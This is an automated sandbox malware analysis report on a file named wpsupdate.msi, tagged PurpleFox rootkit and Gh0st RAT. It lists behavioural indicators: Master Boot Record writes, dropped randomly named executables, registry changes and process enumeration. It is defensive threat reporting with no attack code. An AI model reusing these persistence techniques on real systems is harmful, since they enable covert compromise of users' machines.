Malware Analysis Report

2024-12-07 13:54

Sample ID 241119-fgscbs1emk
Target wpsupdate.msi.vir
SHA256 c17c018f5df7a413dc053a325b6c291c9cd84f1b9e2415ffe205e02a7e5d6b4a
Tags
bootkit discovery execution persistence privilege_escalation gh0strat purplefox rat rootkit trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c17c018f5df7a413dc053a325b6c291c9cd84f1b9e2415ffe205e02a7e5d6b4a

Threat Level: Known bad

The file wpsupdate.msi.vir was found to be: Known bad.

Malicious Activity Summary

bootkit discovery execution persistence privilege_escalation gh0strat purplefox rat rootkit trojan

Gh0st RAT payload

Purplefox family

Detect PurpleFox Rootkit

PurpleFox

Gh0strat

Gh0strat family

Command and Scripting Interpreter: PowerShell

Writes to the Master Boot Record (MBR)

Enumerates connected drives

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Executes dropped EXE

Event Triggered Execution: Installer Packages

System Network Configuration Discovery: Internet Connection Discovery

System Location Discovery: System Language Discovery

Suspicious use of FindShellTrayWindow

Modifies data under HKEY_USERS

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Suspicious behavior: CmdExeWriteProcessMemorySpam

Modifies registry class

Runs ping.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-19 04:51

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-19 04:50

Reported

2024-11-19 04:53

Platform

win7-20241010-en

Max time kernel

118s

Max time network

125s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\wpsupdate.msi

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\TransformOptimisticContributor\2_WSEcydALszNI.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File created C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File created C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File created C:\Program Files\TransformOptimisticContributor\WSEcydALszNI C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File created C:\Program Files\TransformOptimisticContributor\2_WSEcydALszNI.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File created C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.xml C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe C:\Windows\system32\MsiExec.exe N/A
File created C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\TransformOptimisticContributor\VC_redist.x64.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor\pvugBgEMyjnfIRZnnRolAMMekSRFAr C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File created C:\Program Files\TransformOptimisticContributor\wpsupdate.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\TransformOptimisticContributor\pvugBgEMyjnfIRZnnRolAMMekSRFAr C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File created C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe C:\Windows\system32\MsiExec.exe N/A
File created C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.vbs C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.xml C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor\WSEcydALszNI C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\INF\setupapi.ev3 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev1 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\Installer\f779176.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f779177.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9398.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f779176.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f779179.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f779177.ipi C:\Windows\system32\msiexec.exe N/A

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\khdinfo C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\InfoHD3Verify_C = 32003000320034002d00310031002d00310039007c00570044004300200032002e0035002b00320033003200310033003800380030003400310036003500200020002000200020002000200020007c00440045002d00380043002d00460041002d00300044002d00370037002d00390031000000 C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b0ed38ba3e3adb01 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\khdinfo\InfoLastHardInfo C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\DrvInst.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\InfoHDt = "19" C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Kingsoft C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\InfoHD = "0ca3b9e96ee0caa1964f7df64a0e12d5" C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\DrvInst.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\InfoHD3t = "19" C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0 C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\khdinfo\InfoHDModifiedType = "hdidRecalByOldHdidFromRegIsEmpty|2024-11-19" C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\InfoHD3_C = "0ca3b9e96ee0caa1964f7df64a0e12d5" C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\khdinfo\InfoCurHardInfo = "29a56b8a14940c3acb7a4a6443907c56|e4e4a4398a3b0b769cabd9f30bb48026" C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\ProductName = "TransformOptimisticContributor" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\PackageCode = "CCD296EAB4068834AB0FC3DB62EF5779" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\Version = "100859912" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\PackageName = "wpsupdate.msi" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\0FEBA7E590D91C9459F27EF33A43D970 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\ED4346F32F1F8CA46B2D014BA47DCC9B C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\0FEBA7E590D91C9459F27EF33A43D970\ProductFeature C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\ED4346F32F1F8CA46B2D014BA47DCC9B\0FEBA7E590D91C9459F27EF33A43D970 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\Media C:\Windows\system32\msiexec.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
